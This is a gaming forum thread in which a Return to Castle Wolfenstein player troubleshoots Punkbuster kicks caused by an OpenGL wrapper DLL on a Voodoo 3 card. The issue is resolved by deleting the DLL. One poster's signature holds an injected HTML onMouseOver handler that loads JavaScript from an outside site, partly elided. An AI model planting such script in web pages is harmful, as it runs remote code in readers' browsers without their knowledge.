What's the deal with opengl?!?!

Any discussions that are non-rtcw/et related go here.

Moderators: Forum moderators, developers

TypeONegative

What's the deal with opengl?!?!

Post by TypeONegative »

Hey All, can somebody tell me if something has changed with punkbuster or anything else for that matter? I start up a game in OC32 and I get booted by punkbuster after about 30 seconds of gameplay. The following message appears.
"Punkbuster kicked: unknow opengl export C:\Program Files\Return to Castle Wolfenstein\gl\openglv5.dll"

I have tried a clean install of Wolf with the latest patches as well as updating direct x and video drivers for a 3dfx video card. Still the problem exists! :shock:

Basically, If I don't get this fixed I might have to quit playing and get a real life!! :( Please don't let this happen..TIA :)
The Eagle has never lost so much time as when he submitted to learn from the Crow.
bani
Site Admin

Post by bani »

you're using an opengl wrapper.

what video card and driver are you using? what os?
duke'ku

Post by duke'ku »

he's probably using windows, considering his path.
bani
Site Admin

Post by bani »

win98? nt4? w2k? xp?

there are important differences.
TypeONegative

Post by TypeONegative »

Hey Bani and duke'ku, thanks for replying.

I have w2k (ntfs), and Linux RH9, all sevice pack updates are current. I run Wolf on w2k.

I just hope I can avoid pressing the big ol' reset button and reinstalling the OS's (bah hum!!)
The Eagle has never lost so much time as when he submitted to learn from the Crow.
TypeONegative

Post by TypeONegative »

Oh BTW my video card is a Voodoo 3 2000 AGP. Driver version is 5.1.0.2602, Installed a 3rd party driver pack v3-w2k-xp-1.09-beta10.
bani
Site Admin

Post by bani »

its the 3rd party driver likely at fault, remove it
TypeONegative

Post by TypeONegative »

Ok, that is what I am think it is too...I will remove it and letcha know, thanks Bani.
TypeONegative

Post by TypeONegative »

Ok, unless you want the arduous details, it didn't work. Found some new errors too. I tried both original and 3rd party video drivers, went through quite a few install/uninstall sessions; briefly:

(orig)5.0.2080.1 - GLW_StartOpenGL() - could not load OpenGL subsystem
(orig)5.0.2195.232 - Still kicked
(3rd)5.1.0.2600 - Still kicked
(3rd)5.1.0.2602 - Still kicked
(orig)5.0.2195.232 - last attempt at orginals - still kicked

I suppose I will have the fun task of riing the OS over break. No matter its been awhile since my last rebuild, probably needs it.
bani
Site Admin

Post by bani »

evenbalance did add some new checks to pb, its possible your setup is causing false positives.

drop a line to support@evenbalance.com describing your problems
bacon

Post by bacon »

Why would you use beta drivers?
Also The Quake3 engine uses OpenGL 1.4, your drivers are probably using OpenGL 1.3 or lower.
Rain

Post by Rain »

bacon wrote:Why would you use beta drivers?
Also The Quake3 engine uses OpenGL 1.4, your drivers are probably using OpenGL 1.3 or lower.
That's interesting, considering that the OpenGL 1.4 specification was released on July 24, 2000, while Quake 3 test 1.08 was released on August 3, 1999.

I'm not certain, but Q3 may well run on a card supporting OpenGL 1.1. I'm nearly positive it'll run work with OpenGL 1.2, although I don't have libraries old enough to test that theory. I am positive it'll work with OpenGL 1.3.

That said, Q3 will take advantage of features provided by the newer OpenGL specs (up to 1.3, at least) if they're supported by the GL library.
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
TypeONegative

Post by TypeONegative »

Sorry took so long for an update, and thanks Bacon and Rain for posting. I just heard back from the support at evenbalance that Bani suggested. The solution was just to delete the opengl dll files that were causing the problem. (I feel like a dumbass now that I did not trying that myself).

Anyhow, hopefully this will help someone else from losing their hair. Thanks again...now "let's get it on wit da killin" :) [/quote]
-Prospector-

Post by -Prospector- »

No problem. You sound like a cool guy. :)
System Specs: Prospector's Place, 512MB of RAM PC3200 512MB Corsair, Albatron GeForce4 Ti4600 128MB AGP 8x, Intel Pentium 4 2.4B Ghz 2.66B Ghz 533Mhz FSB, ATA133 40GB Maxtor 7200 RPM, Jetway 865GDMP 800FSB